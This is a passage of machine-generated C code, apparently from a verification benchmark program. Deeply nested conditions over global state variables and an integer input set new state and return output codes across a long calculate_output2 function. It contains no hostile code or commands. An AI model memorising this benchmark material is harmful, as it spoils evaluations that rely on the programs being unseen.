a4 = 16;
a3 = 1;
a26 = 17;
a28 = 15;
return -1;
} else if(((!(a3==1)&&((((a25==1)&&(((((a26==18)||(a26==19))&&(input==4))&&(a14==18))&&(a7==1)))&&(a4==17))&&(a28==15)))&&(a1==1))){
a26 = 19;
return 23;
} else if(((a25==1)&&(((((!(a3==1)&&(!(a7==1)&&((input==6)&&((a26==18)||(a26==19)))))&&(a28==15))&&(a4==18))&&(a1==1))&&(a14==19)))){
a14 = 18;
a7 = 1;
a26 = 17;
a3 = 1;
a4 = 16;
return -1;
} else if(((a28==15)&&(!(a3==1)&&((a4==18)&&(((a1==1)&&((((!(a7==1)&&(a26==19))&&(a14==18))||(((a7==1)&&(a26==17))&&(a14==19)))&&(input==3)))&&(a25==1)))))){
a4 = 16;
a3 = 1;
a14 = 18;
a26 = 17;
a7 = 1;
return -1;
} else if(((a4==16)&&((a1==1)&&((a14==20)&&((!(a3==1)&&((a28==16)&&((input==3)&&(((a7==1)&&(a26==19))||((a26==17)&&!(a7==1))))))&&(a25==1)))))){
a28 = 15;
a3 = 1;
a14 = 18;
a26 = 17;
a7 = 1;
return -1;
} return calculate_output2(input);
}
int calculate_output2(int input) {
if((((a28==16)&&((((a25==1)&&(((a1==1)&&((a4==18)&&(input==4)))&&(a14==18)))&&(a26==18))&&!(a7==1)))&&(a3==1))){
a28 = 15;
a7 = 1;
a4 = 16;
a26 = 17;
return -1;
} else if(((a25==1)&&((a4==17)&&((a28==15)&&((((((((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))||(!(a7==1)&&(a26==18)))&&(input==1))&&(a3==1))&&(a14==19))&&(a1==1)))))){
a14 = 20;
a26 = 17;
a7 = 0;
return 22;
} else if(((a4==16)&&((!(a3==1)&&(((a14==19)&&((((input==3)&&(a28==15))&&(a26==19))&&(a25==1)))&&(a1==1)))&&(a7==1)))){
a26 = 17;
a3 = 1;
a14 = 18;
return -1;
} else if(((!(a3==1)&&((((((a26==18)&&((input==1)&&(a4==16)))&&(a1==1))&&(a28==17))&&(a14==18))&&(a7==1)))&&(a25==1))){
return -1;
} else if((((!(a7==1)&&((a14==18)&&(((!(a3==1)&&((input==3)&&(a1==1)))&&(a25==1))&&(a28==17))))&&(a4==16))&&(a26==18))){
a7 = 1;
return 24;
} else if(((a28==16)&&(((((a14==20)&&((((input==4)&&((a26==18)||(a26==19)))&&!(a7==1))&&!(a3==1)))&&(a1==1))&&(a4==17))&&(a25==1)))){
a26 = 18;
a28 = 15;
a7 = 1;
return -1;
} else if(((!(a3==1)&&((a25==1)&&((a28==17)&&((a14==18)&&((a4==17)&&(((input==3)&&((a26==17)||(a26==18)))&&(a7==1)))))))&&(a1==1))){
a26 = 17;
a4 = 16;
a28 = 15;
a3 = 1;
return -1;
} else if((((a3==1)&&(((((((a14==19)&&(!(a7==1)&&(a26==19)))||(((a7==1)&&(a26==17))&&(a14==20)))&&(input==2))&&(a1==1))&&(a25==1))&&(a4==18)))&&(a28==17))){
a14 = 18;
a26 = 17;
a28 = 15;
a4 = 16;
a7 = 1;
return -1;
} else if(((a14==20)&&((((!(a3==1)&&((a4==17)&&(((input==1)&&((a26==19)||((a26==17)||(a26==18))))&&(a28==17))))&&!(a7==1))&&(a25==1))&&(a1==1)))){
a26 = 18;
a14 = 18;
a28 = 15;
a4 = 18;
return 22;
} else if((((a3==1)&&((((((input==5)&&((((a7==1)&&(a26==18))||((a7==1)&&(a26==19)))||((a26==17)&&!(a7==1))))&&(a25==1))&&(a28==16))&&(a14==20))&&(a1==1)))&&(a4==17))){
a14 = 18;
a28 = 15;
a26 = 17;
a4 = 16;
a7 = 1;
return -1;
} else if((((((((a25==1)&&((((a26==17)||(a26==18))&&(input==6))&&(a1==1)))&&(a4==17))&&!(a3==1))&&(a14==18))&&!(a7==1))&&(a28==15))){
a26 = 18;
a4 = 16;
a7 = 1;
a28 = 17;
return -1;
} else if(((a4==17)&&(((((a25==1)&&(((((a26==18)&&!(a7==1))||(((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17))))&&(input==3))&&(a1==1)))&&(a3==1))&&(a28==15))&&(a14==19)))){
a4 = 16;
a7 = 1;
a26 = 17;
a14 = 18;
return -1;
} else if((((a25==1)&&((a26==19)&&((a14==20)&&((a3==1)&&(((a1==1)&&((input==2)&&(a4==18)))&&(a7==1))))))&&(a28==15))){
a14 = 18;
a4 = 16;
a26 = 17;
return -1;
} else if(((a26==19)&&((a28==15)&&((a25==1)&&(((a1==1)&&((!(a3==1)&&((a4==16)&&(input==3)))&&(a14==20)))&&(a7==1)))))){
a3 = 1;
a26 = 17;
a14 = 18;
return -1;
} else if((((((a1==1)&&((a26==17)&&((a25==1)&&(((input==2)&&(a7==1))&&(a14==19)))))&&(a28==16))&&(a3==1))&&(a4==18))){
a4 = 16;
a14 = 18;
a28 = 15;
return -1;
} else if((!(a7==1)&&((a25==1)&&(((a1==1)&&(((((a14==20)&&(input==4))&&!(a3==1))&&(a4==18))&&(a26==17)))&&(a28==15))))){
a14 = 18;
a4 = 16;
a3 = 1;
a7 = 1;
return -1;
} else if(((a28==15)&&((a1==1)&&((a4==18)&&(!(a3==1)&&((((((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))&&(input==5))&&(a25==1))&&(a14==18))))))){
a7 = 1;
a4 = 16;
a26 = 17;
a3 = 1;
return -1;
} else if((((a14==19)&&((a4==18)&&((a28==16)&&((a25==1)&&(!(a7==1)&&((a1==1)&&((input==2)&&((a26==18)||(a26==19)))))))))&&(a3==1))){
a28 = 17;
a26 = 17;
return 26;
} else if((((((a28==16)&&((((((a26==17)||(a26==18))&&(input==3))&&(a1==1))&&(a4==17))&&!(a7==1)))&&(a14==19))&&!(a3==1))&&(a25==1))){
a26 = 18;
return -1;
} else if((((((a25==1)&&((a4==17)&&((((((a26==18)&&!(a7==1))&&(a14==19))||((!(a7==1)&&(a26==19))&&(a14==19)))||((a14==20)&&((a7==1)&&(a26==17))))&&(input==2))))&&(a3==1))&&(a28==17))&&(a1==1))){
a14 = 18;
a28 = 15;
a4 = 16;
a26 = 17;
a7 = 1;
return -1;
} else if((((a25==1)&&(((((a4==18)&&(((input==1)&&(a26==19))&&(a28==15)))&&(a7==1))&&(a14==20))&&(a1==1)))&&(a3==1))){
a4 = 16;
a26 = 17;
a14 = 18;
return -1;
} else if(((a28==15)&&((a26==19)&&((a4==17)&&((!(a7==1)&&(!(a3==1)&&(((a1==1)&&(input==5))&&(a14==19))))&&(a25==1)))))){
a14 = 18;
a7 = 1;
a4 = 16;
a3 = 1;
a26 = 17;
return -1;
} else if(((a1==1)&&((a25==1)&&(((a3==1)&&(((a4==17)&&(((!(a7==1)&&(a26==17))||(((a26==18)&&(a7==1))||((a26==19)&&(a7==1))))&&(input==3)))&&(a28==16)))&&(a14==20))))){
a28 = 15;
a7 = 1;
a14 = 18;
a4 = 16;
a26 = 17;
return -1;
} else if(((a25==1)&&(((a14==19)&&(((((a3==1)&&((a4==18)&&(input==2)))&&(a26==19))&&(a28==15))&&(a1==1)))&&(a7==1)))){
a28 = 17;
a26 = 17;
a7 = 0;
a14 = 20;
return 22;
} else if((((a25==1)&&((a4==17)&&((a1==1)&&(((((a7==1)&&((a28==16)&&(a26==17)))&&(a14==18))||(((a14==20)&&(!(a7==1)&&((a28==15)&&(a26==18))))||((a14==20)&&(!(a7==1)&&((a26==19)&&(a28==15))))))&&(input==6)))))&&!(a3==1))){
a7 = 0;
a28 = 15;
a26 = 17;
a14 = 20;
return 23;
} else if(((a25==1)&&((((!(a3==1)&&((a4==18)&&((a28==15)&&((a26==17)&&(input==1)))))&&(a1==1))&&(a14==20))&&!(a7==1)))){
a28 = 16;
a7 = 1;
a14 = 18;
return 22;
} else if((((a28==17)&&(((a4==18)&&((a26==18)&&((a3==1)&&((a1==1)&&((a14==19)&&(input==6))))))&&!(a7==1)))&&(a25==1))){
a7 = 1;
a28 = 15;
a14 = 18;
a26 = 17;
a4 = 16;
return -1;
} else if(((((a3==1)&&((((a26==18)&&(((a25==1)&&(input==5))&&(a28==16)))&&!(a7==1))&&(a1==1)))&&(a4==18))&&(a14==18))){
a7 = 1;
a28 = 15;
a26 = 17;
a4 = 16;
return -1;
} else if(((a3==1)&&((a4==18)&&(((!(a7==1)&&((a14==19)&&((a1==1)&&((input==3)&&((a26==17)||(a26==18))))))&&(a25==1))&&(a28==15))))){
a4 = 16;
a26 = 17;
a14 = 18;
a7 = 1;
return -1;
} else if((((a28==15)&&((a25==1)&&((a7==1)&&((((a3==1)&&((input==1)&&(a1==1)))&&(a26==19))&&(a4==18)))))&&(a14==19))){
a4 = 16;
a14 = 18;
a26 = 17;
return -1;
} else if(((!(a3==1)&&((((((a4==16)&&((a25==1)&&(input==5)))&&(a26==19))&&(a7==1))&&(a1==1))&&(a14==18)))&&(a28==15))){
a26 = 17;
a3 = 1;
return -1;
} else if((((((a28==16)&&(((a14==20)&&(((!(a7==1)&&(a26==17))||(((a26==18)&&(a7==1))||((a26==19)&&(a7==1))))&&(input==2)))&&!(a3==1)))&&(a4==17))&&(a25==1))&&(a1==1))){
a7 = 0;
a26 = 17;
a28 = 15;
return -1;
} else if(((a3==1)&&((((((a1==1)&&((input==2)&&((((a26==18)&&(a7==1))||((a7==1)&&(a26==19)))||((a26==17)&&!(a7==1)))))&&(a25==1))&&(a28==16))&&(a4==17))&&(a14==18)))){
a4 = 16;
a7 = 1;
a28 = 15;
a26 = 17;
return -1;
} else if(((a28==17)&&((!(a7==1)&&((a25==1)&&((a1==1)&&((a26==18)&&(((a14==18)&&(input==6))&&(a4==16))))))&&!(a3==1)))){
a3 = 1;
a28 = 15;
a7 = 1;
a26 = 17;
return -1;
} else if(((a1==1)&&((a25==1)&&((((((a26==18)&&((input==5)&&(a28==17)))&&(a14==19))&&!(a7==1))&&!(a3==1))&&(a4==16))))){
a4 = 17;
a14 = 18;
a28 = 16;
a7 = 1;
return 23;
} else if(((a1==1)&&((a25==1)&&(((a3==1)&&((a28==15)&&((((a14==19)&&((a26==19)&&!(a7==1)))||((a14==20)&&((a26==17)&&(a7==1))))&&(input==5))))&&(a4==17))))){
a7 = 0;
a26 = 17;
a14 = 19;
a28 = 16;
return 24;
} else if(((a28==17)&&(((a25==1)&&(((((((a14==18)&&(!(a7==1)&&(a26==19)))||((a14==19)&&((a7==1)&&(a26==17))))||((a14==19)&&((a7==1)&&(a26==18))))&&(input==2))&&(a4==18))&&(a1==1)))&&!(a3==1)))){
a7 = 1;
a26 = 19;
a14 = 18;
return -1;
} else if(((a1==1)&&(((a7==1)&&((a28==15)&&((a14==20)&&((((a26==19)&&(input==2))&&(a3==1))&&(a4==17)))))&&(a25==1)))){
a26 = 17;
a14 = 18;
a4 = 16;
return -1;
} else if(((!(a3==1)&&((a4==17)&&(!(a7==1)&&(((((input==5)&&(a14==19))&&(a26==19))&&(a25==1))&&(a1==1)))))&&(a28==17))){
a28 = 15;
a4 = 16;
a7 = 1;
a26 = 17;
a14 = 18;
a3 = 1;
return -1;
} else if(((((a1==1)&&((((((input==2)&&(a28==17))&&!(a7==1))&&(a26==18))&&(a25==1))&&!(a3==1)))&&(a4==16))&&(a14==19))){
a3 = 1;
a7 = 1;
a28 = 15;
a26 = 17;
a14 = 18;
return -1;
} else if((((a4==18)&&(((a14==18)&&((a1==1)&&(!(a7==1)&&((a25==1)&&((a26==18)&&(input==2))))))&&(a3==1)))&&(a28==16))){
a28 = 15;
a7 = 1;
a4 = 16;
a26 = 17;
return -1;
} else if(((((a25==1)&&((((a14==20)&&((input==4)&&(((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))))&&(a28==16))&&!(a3==1)))&&(a1==1))&&(a4==16))){
a14 = 18;
a26 = 17;
a28 = 15;
a7 = 1;
a3 = 1;
return -1;
} else if(((a4==17)&&((!(a3==1)&&((a25==1)&&((a28==16)&&((((((a26==18)&&(a7==1))||((a7==1)&&(a26==19)))||(!(a7==1)&&(a26==17)))&&(input==5))&&(a14==18)))))&&(a1==1)))){
a26 = 17;
a28 = 15;
a4 = 16;
a3 = 1;
a7 = 1;
return -1;
} else if(((a1==1)&&((a14==20)&&((a25==1)&&((!(a3==1)&&((a4==16)&&((((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))&&(input==4))))&&(a28==17)))))){
a26 = 18;
a4 = 17;
a28 = 16;
a14 = 19;
a7 = 1;
return 24;
} else if(((((((input==3)&&(((((a26==17)&&(a28==17))&&(a7==1))&&(a14==18))||(((a14==20)&&(!(a7==1)&&((a26==18)&&(a28==16))))||((((a28==16)&&(a26==19))&&!(a7==1))&&(a14==20)))))&&!(a3==1))&&(a4==16))&&(a25==1))&&(a1==1))){
a3 = 1;
a7 = 1;
a14 = 18;
a28 = 15;
a26 = 17;
return -1;
} else if((((((a25==1)&&((a1==1)&&((((((a7==1)&&(a26==18))||((a26==19)&&(a7==1)))||(!(a7==1)&&(a26==17)))&&(input==4))&&(a14==19))))&&(a28==16))&&(a4==18))&&(a3==1))){
a28 = 15;
a7 = 1;
a4 = 16;
a26 = 17;
a14 = 18;
return -1;
} else if((((a28==15)&&((a26==18)&&((((((input==1)&&(a4==17))&&(a1==1))&&(a7==1))&&(a14==19))&&(a25==1))))&&(a3==1))){
a14 = 20;
return 26;
} else if((!(a3==1)&&((((((((((a26==19)&&!(a7==1))&&(a14==19))||(((a7==1)&&(a26==17))&&(a14==20)))||(((a26==18)&&(a7==1))&&(a14==20)))&&(input==4))&&(a28==16))&&(a25==1))&&(a4==18))&&(a1==1)))){
a26 = 19;
a14 = 20;
a7 = 0;
return 26;
} else if(((a25==1)&&((a14==18)&&(((((a4==18)&&(((((a26==18)&&(a7==1))||((a7==1)&&(a26==19)))||(!(a7==1)&&(a26==17)))&&(input==6)))&&(a28==16))&&(a3==1))&&(a1==1))))){
a7 = 1;
a4 = 16;
a28 = 15;
a26 = 17;
return -1;
} else if(((a25==1)&&((a4==16)&&(!(a3==1)&&(((((a14==20)&&(!(a7==1)&&((a26==19)&&(a28==15))))||((a14==18)&&(((a28==16)&&(a26==17))&&(a7==1))))&&(input==5))&&(a1==1)))))){
a26 = 17;
a14 = 18;
a28 = 15;
a7 = 1;
a3 = 1;
return -1;
} else if(((a28==15)&&((a4==17)&&((!(a3==1)&&((a14==18)&&((a1==1)&&(((input==3)&&((a26==18)||(a26==19)))&&(a7==1)))))&&(a25==1))))){
a4 = 16;
a26 = 18;
a28 = 17;
return -1;
} else if(((a14==18)&&((((((a4==16)&&((!(a3==1)&&(input==1))&&(a25==1)))&&(a28==17))&&(a1==1))&&!(a7==1))&&(a26==18)))){
a26 = 17;
a7 = 1;
a3 = 1;
a28 = 15;
return -1;
} else if((((((((a25==1)&&((a7==1)&&((input==6)&&(((a26==17)||(a26==18))||(a26==19)))))&&(a1==1))&&(a4==17))&&(a28==15))&&!(a3==1))&&(a14==20))){
a26 = 18;
a4 = 16;
a14 = 19;
a28 = 17;
return -1;
} else if((((a3==1)&&((a28==17)&&((a4==18)&&(((a25==1)&&((input==6)&&((!(a7==1)&&(a26==17))||(((a26==18)&&(a7==1))||((a7==1)&&(a26==19))))))&&(a14==20)))))&&(a1==1))){
a14 = 18;
a26 = 18;
a28 = 16;
a3 = 0;
a7 = 0;
a4 = 16;
return 24;
} else if(((a26==18)&&((a14==19)&&(((a4==17)&&((!(a3==1)&&((a1==1)&&((input==2)&&!(a7==1))))&&(a28==17)))&&(a25==1))))){
a3 = 1;
a4 = 16;
a14 = 18;
a26 = 17;
a7 = 1;
a28 = 15;
return -1;
} else if((((((a4==17)&&(((((!(a7==1)&&(a26==18))||(((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17))))&&(input==4))&&(a1==1))&&(a25==1)))&&(a3==1))&&(a28==15))&&(a14==19))){
a26 = 17;
a28 = 16;
a7 = 1;
a14 = 18;
return 22;
} else if(((((((a25==1)&&((a26==18)&&((a7==1)&&((input==1)&&(a14==20)))))&&(a3==1))&&(a1==1))&&(a4==17))&&(a28==15))){
a4 = 16;
a26 = 17;
a14 = 18;
return -1;
} else if(((a14==19)&&((a26==19)&&((a7==1)&&((((a3==1)&&(((a25==1)&&(input==6))&&(a4==18)))&&(a1==1))&&(a28==15)))))){
a14 = 18;
a26 = 17;
a4 = 16;
return -1;
} else if((((a4==17)&&(((a1==1)&&((((((!(a7==1)&&(a26==18))&&(a14==19))||(((a26==19)&&!(a7==1))&&(a14==19)))||((a14==20)&&((a26==17)&&(a7==1))))&&(input==4))&&(a3==1)))&&(a25==1)))&&(a28==16))){
a28 = 15;
a14 = 20;
a7 = 1;
a4 = 18;
a26 = 19;
return 26;
} else if(((a14==19)&&((a4==18)&&(!(a7==1)&&((a25==1)&&(((((a1==1)&&(input==2))&&(a28==16))&&(a26==18))&&!(a3==1))))))){
a14 = 18;
a7 = 1;
a4 = 16;
a28 = 17;
a3 = 1;
return -1;
} else if(((!(a3==1)&&(((a4==18)&&(((input==1)&&((((a26==19)&&!(a7==1))&&(a14==18))||(((a26==17)&&(a7==1))&&(a14==19))))&&(a28==16)))&&(a25==1)))&&(a1==1))){
a14 = 18;
a3 = 1;
a28 = 15;
a7 = 1;
a26 = 17;
a4 = 16;
return -1;
} else if(((a28==15)&&(((a25==1)&&(((((((a26==18)&&(a7==1))&&(a14==20))||((((a26==19)&&!(a7==1))&&(a14==19))||(((a7==1)&&(a26==17))&&(a14==20))))&&(input==6))&&(a4==18))&&(a1==1)))&&(a3==1)))){
a26 = 17;
a4 = 16;
a14 = 18;
a7 = 1;
return -1;
} else if(((!(a7==1)&&((a4==18)&&((a1==1)&&(((a26==18)&&(((input==1)&&(a14==19))&&(a28==17)))&&(a3==1)))))&&(a25==1))){
a14 = 18;
a7 = 1;
a4 = 16;
a28 = 15;
a26 = 17;
return -1;
} else if((((a4==18)&&(((((a1==1)&&((a25==1)&&((a14==18)&&(input==5))))&&(a3==1))&&!(a7==1))&&(a26==19)))&&(a28==16))){
a7 = 1;
a4 = 16;
a26 = 17;
a28 = 15;
return -1;
} else if(((a28==16)&&(((a25==1)&&(((a4==18)&&((((a14==20)&&((a7==1)&&(a26==18)))||((((a26==19)&&!(a7==1))&&(a14==19))||(((a7==1)&&(a26==17))&&(a14==20))))&&(input==2)))&&(a1==1)))&&!(a3==1)))){
a28 = 17;
a4 = 16;
a26 = 19;
a7 = 0;
a3 = 1;
a14 = 18;
return -1;
} else if(((a4==18)&&(!(a3==1)&&((((a25==1)&&((a28==16)&&((input==6)&&(((a26==18)&&!(a7==1))||(((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))))))&&(a1==1))&&(a14==18))))){
a3 = 1;
a4 = 16;
a26 = 17;
a28 = 15;
a7 = 1;
return -1;
} else if((!(a7==1)&&((a28==15)&&((((a25==1)&&(((a14==18)&&((((a26==17)||(a26==18))||(a26==19))&&(input==4)))&&(a1==1)))&&(a3==1))&&(a4==18))))){
a7 = 1;
a26 = 17;
a4 = 16;
return -1;
} else if(((a3==1)&&((a25==1)&&((a26==18)&&((a4==18)&&(((a7==1)&&(((a28==15)&&(input==3))&&(a14==19)))&&(a1==1))))))){
a14 = 18;
a4 = 16;
a26 = 17;
return -1;
} else if(((a1==1)&&(((((a28==16)&&((input==1)&&(((a14==20)&&((a26==17)&&(a7==1)))||(((!(a7==1)&&(a26==18))&&(a14==19))||(((a26==19)&&!(a7==1))&&(a14==19))))))&&(a4==17))&&(a25==1))&&(a3==1)))){
a14 = 18;
a28 = 15;
a26 = 17;
a7 = 1;
a4 = 16;
return -1;
} else if(((((a28==15)&&((a1==1)&&((a4==17)&&(((((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))&&(input==1))&&(a14==19)))))&&!(a3==1))&&(a25==1))){
a7 = 1;
a26 = 17;
a3 = 1;
a4 = 16;
a14 = 18;
return -1;
} else if((((a14==19)&&(((((a1==1)&&((input==3)&&(((a26==17)&&!(a7==1))||(((a26==18)&&(a7==1))||((a26==19)&&(a7==1))))))&&(a3==1))&&(a28==17))&&(a4==17)))&&(a25==1))){
a7 = 1;
a28 = 15;
a14 = 18;
a4 = 16;
a26 = 17;
return -1;
} else if(((a28==17)&&(((a3==1)&&((a25==1)&&((a1==1)&&((input==6)&&(((a14==18)&&((a26==19)&&!(a7==1)))||((a14==19)&&((a26==17)&&(a7==1))))))))&&(a4==18)))){
a26 = 19;
a14 = 18;
a7 = 0;
return -1;
} else if((((a25==1)&&((a4==18)&&((a1==1)&&((input==4)&&((((a7==1)&&((a26==17)&&(a28==17)))&&(a14==18))||(((a14==20)&&(!(a7==1)&&((a28==16)&&(a26==18))))||((a14==20)&&(!(a7==1)&&((a26==19)&&(a28==16))))))))))&&(a3==1))){
a7 = 1;
a28 = 15;
a26 = 17;
a4 = 16;
a14 = 18;
return -1;
} else if(((a28==15)&&(((((((a4==16)&&((a14==18)&&(input==3)))&&(a25==1))&&(a7==1))&&!(a3==1))&&(a1==1))&&(a26==19)))){
a26 = 17;
a3 = 1;
return -1;
} else if((((((((a28==15)&&(((input==6)&&(a4==17))&&(a14==20)))&&(a7==1))&&(a26==19))&&(a3==1))&&(a25==1))&&(a1==1))){
a28 = 17;
a14 = 18;
return 23;
} else if(((a14==19)&&(((a1==1)&&(((!(a7==1)&&((a4==18)&&((input==1)&&(a28==16))))&&(a26==18))&&!(a3==1)))&&(a25==1)))){
a7 = 1;
a26 = 19;
a4 = 17;
a3 = 1;
a28 = 15;
a14 = 18;
return -1;
} else if(((a28==17)&&((((!(a3==1)&&((input==3)&&((((a14==18)&&(!(a7==1)&&(a26==19)))||((a14==19)&&((a7==1)&&(a26==17))))||((a14==19)&&((a26==18)&&(a7==1))))))&&(a25==1))&&(a4==17))&&(a1==1)))){
a14 = 18;
a28 = 15;
a7 = 1;
a26 = 17;
a4 = 16;
a3 = 1;
return -1;
} else if(((a28==16)&&(((a7==1)&&((a25==1)&&((a14==19)&&((a1==1)&&((((a26==17)||(a26==18))&&(input==5))&&(a4==16))))))&&!(a3==1)))){
a28 = 15;
a14 = 18;
a26 = 17;
a3 = 1;
return -1;
} else if(((a4==16)&&(((((a7==1)&&((a25==1)&&(((input==4)&&(a1==1))&&!(a3==1))))&&(a14==19))&&(a28==15))&&(a26==19)))){
a14 = 18;
a26 = 17;
a3 = 1;
return -1;
} else if(((a28==17)&&((a3==1)&&(((a4==17)&&((((((!(a7==1)&&(a26==18))&&(a14==18))||((a14==18)&&(!(a7==1)&&(a26==19))))||(((a7==1)&&(a26==17))&&(a14==19)))&&(input==2))&&(a25==1)))&&(a1==1))))){
a28 = 15;
a7 = 1;
a26 = 17;
a4 = 16;
a14 = 18;
return -1;
} else if((((a3==1)&&(((((((((a26==18)&&(a28==16))&&!(a7==1))&&(a14==20))||((!(a7==1)&&((a28==16)&&(a26==19)))&&(a14==20)))||((a14==18)&&((a7==1)&&((a26==17)&&(a28==17)))))&&(input==3))&&(a25==1))&&(a1==1)))&&(a4==18))){
a26 = 19;
a4 = 16;
a3 = 0;
a28 = 15;
a7 = 0;
a14 = 20;
return 22;
} else if(((a1==1)&&((a3==1)&&(((a28==16)&&((a25==1)&&((a14==20)&&((a4==17)&&(((a26==18)||(a26==19))&&(input==5))))))&&!(a7==1))))){
a4 = 16;
a26 = 17;
a14 = 18;
a7 = 1;
a28 = 15;
return -1;
} else if(((a4==18)&&(((a14==18)&&((a28==15)&&(!(a7==1)&&(((a25==1)&&((((a26==17)||(a26==18))||(a26==19))&&(input==2)))&&(a1==1)))))&&(a3==1)))){
a26 = 17;
a7 = 1;
a4 = 16;
return -1;
} else if((((a4==17)&&((a28==16)&&(((a3==1)&&(((((a26==17)&&(a7==1))&&(a14==20))||((((a26==18)&&!(a7==1))&&(a14==19))||(((a26==19)&&!(a7==1))&&(a14==19))))&&(input==3)))&&(a1==1))))&&(a25==1))){
a26 = 17;
a28 = 15;
a4 = 16;
a7 = 1;
a14 = 18;
return -1;
} else if(((a14==19)&&((!(a3==1)&&((((a1==1)&&((a7==1)&&((input==4)&&((a26==18)||(a26==19)))))&&(a28==17))&&(a25==1)))&&(a4==16)))){
a14 = 20;
a28 = 15;
a26 = 18;
a4 = 17;
return 23;
} else if(((((a1==1)&&(((a3==1)&&((a14==19)&&((a4==18)&&((a7==1)&&(input==4)))))&&(a28==15)))&&(a26==19))&&(a25==1))){
a26 = 17;
a4 = 16;
a14 = 18;
return -1;
} else if((((a1==1)&&(!(a3==1)&&((((a4==17)&&((((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))&&(input==4)))&&(a14==19))&&(a28==15))))&&(a25==1))){
a7 = 1;
a26 = 17;
a28 = 16;
a14 = 20;
return 24;
} else if((((a28==15)&&(((((a25==1)&&((((a26==18)||(a26==19))&&(input==5))&&(a4==18)))&&(a7==1))&&(a14==18))&&(a3==1)))&&(a1==1))){
a4 = 16;
a26 = 17;
return -1;
} else if(((a25==1)&&(((a28==15)&&(((a7==1)&&(!(a3==1)&&((((a26==18)||(a26==19))&&(input==2))&&(a4==17))))&&(a14==18)))&&(a1==1)))){
a26 = 19;
return 23;
} else if((((a14==19)&&(((!(a3==1)&&((((input==5)&&((a26==17)||(a26==18)))&&(a7==1))&&(a28==15)))&&(a4==16))&&(a25==1)))&&(a1==1))){
a28 = 17;
a14 = 18;
a26 = 17;
return 22;
} else if(((a25==1)&&(((a1==1)&&(!(a3==1)&&(((a4==17)&&((a28==16)&&(((a26==18)||(a26==19))&&(input==2))))&&(a14==18))))&&!(a7==1)))){
a4 = 16;
a28 = 15;
a3 = 1;
a7 = 1;
a26 = 17;
return -1;
} else if(((a14==20)&&((((a3==1)&&(((((input==1)&&(a25==1))&&(a28==16))&&(a1==1))&&(a7==1)))&&(a26==17))&&(a4==18)))){
a14 = 18;
a4 = 16;
a28 = 15;
return -1;
} else if(((a25==1)&&(((a14==18)&&(!(a3==1)&&((a4==17)&&((a28==16)&&(((((a7==1)&&(a26==18))||((a7==1)&&(a26==19)))||((a26==17)&&!(a7==1)))&&(input==3))))))&&(a1==1)))){
a4 = 16;
a3 = 1;
a7 = 1;
a28 = 15;
a26 = 17;
return -1;
} else if((((a1==1)&&((((!(a7==1)&&((a25==1)&&((input==4)&&(a14==19))))&&(a4==17))&&!(a3==1))&&(a26==18)))&&(a28==15))){
a4 = 16;
a26 = 17;
a14 = 18;
a7 = 1;
a3 = 1;
return -1;
} else if(((((((a1==1)&&(((((a26==18)||(a26==19))&&(input==5))&&(a14==20))&&!(a3==1)))&&!(a7==1))&&(a28==15))&&(a25==1))&&(a4==18))){
a14 = 18;
a4 = 16;
a26 = 17;
a7 = 1;
a3 = 1;
return -1;
} else if((!(a7==1)&&(((a14==19)&&((a4==17)&&(((!(a3==1)&&((input==4)&&(a25==1)))&&(a28==17))&&(a26==18))))&&(a1==1)))){
a4 = 16;
a7 = 1;
a3 = 1;
a28 = 15;
a26 = 17;
a14 = 18;
return -1;
} else if(((a28==17)&&((a25==1)&&((((((input==3)&&((!(a7==1)&&(a26==18))||(((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))))&&!(a3==1))&&(a1==1))&&(a4==17))&&(a14==18))))){
a7 = 1;
a4 = 16;
a26 = 17;
a3 = 1;
a28 = 15;
return -1;
} else if((((!(a7==1)&&((a28==16)&&((a14==18)&&(((a1==1)&&((input==1)&&((a26==18)||(a26==19))))&&!(a3==1)))))&&(a25==1))&&(a4==16))){
a7 = 1;
a26 = 17;
a28 = 15;
a3 = 1;
return -1;
} else if(((a25==1)&&((a1==1)&&(((((a7==1)&&((a28==15)&&(((a4==16)&&!(a3==1))&&(a26==18))))&&(a14==18))||(((a14==20)&&(!(a7==1)&&((((a3==1)&&(a4==18))&&(a26==19))&&(a28==17))))||(((a7==1)&&((((a4==16)&&!(a3==1))&&(a26==17))&&(a28==15)))&&(a14==18))))&&(input==3))))){
a28 = 15;
a7 = 1;
a14 = 18;
a3 = 1;
a26 = 17;
a4 = 16;
return -1;
} else if(((a25==1)&&((((a28==15)&&((a26==17)&&((a4==18)&&((a14==19)&&((a3==1)&&(input==1))))))&&(a1==1))&&(a7==1)))){
a4 = 16;
a14 = 18;
return -1;
} else if(((a1==1)&&((!(a7==1)&&(((a14==19)&&(((a3==1)&&((input==6)&&((a26==18)||(a26==19))))&&(a4==18)))&&(a28==16)))&&(a25==1)))){
a7 = 1;
a26 = 17;
a28 = 15;
a14 = 18;
a4 = 16;
return -1;
} else if(((((a1==1)&&((input==2)&&(((a14==20)&&(!(a7==1)&&((a28==17)&&((a4==17)&&(a26==19)))))||(((a7==1)&&(((a26==17)&&(a4==18))&&(a28==15)))&&(a14==18)))))&&(a3==1))&&(a25==1))){
a4 = 18;
a26 = 18;
a14 = 18;
a7 = 0;
a28 = 17;
return 22;
} else if(((a4==17)&&(!(a3==1)&&((((((((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17)))&&(input==6))&&(a28==15))&&(a1==1))&&(a25==1))&&(a14==19))))){
a14 = 18;
a3 = 1;
a26 = 17;
a7 = 1;
a4 = 16;
return -1;
} else if(((((a4==16)&&((a25==1)&&((((a7==1)&&((a14==18)&&(input==4)))&&(a26==18))&&(a28==17))))&&(a1==1))&&!(a3==1))){
a3 = 1;
a28 = 15;
a26 = 17;
return -1;
} else if(((((a28==17)&&((a1==1)&&(((input==4)&&((((a26==17)&&(a7==1))&&(a14==19))||(((a14==18)&&(!(a7==1)&&(a26==18)))||((a14==18)&&((a26==19)&&!(a7==1))))))&&(a25==1))))&&(a3==1))&&(a4==17))){
a28 = 15;
a7 = 1;
a26 = 17;
a4 = 16;
a14 = 18;
return -1;
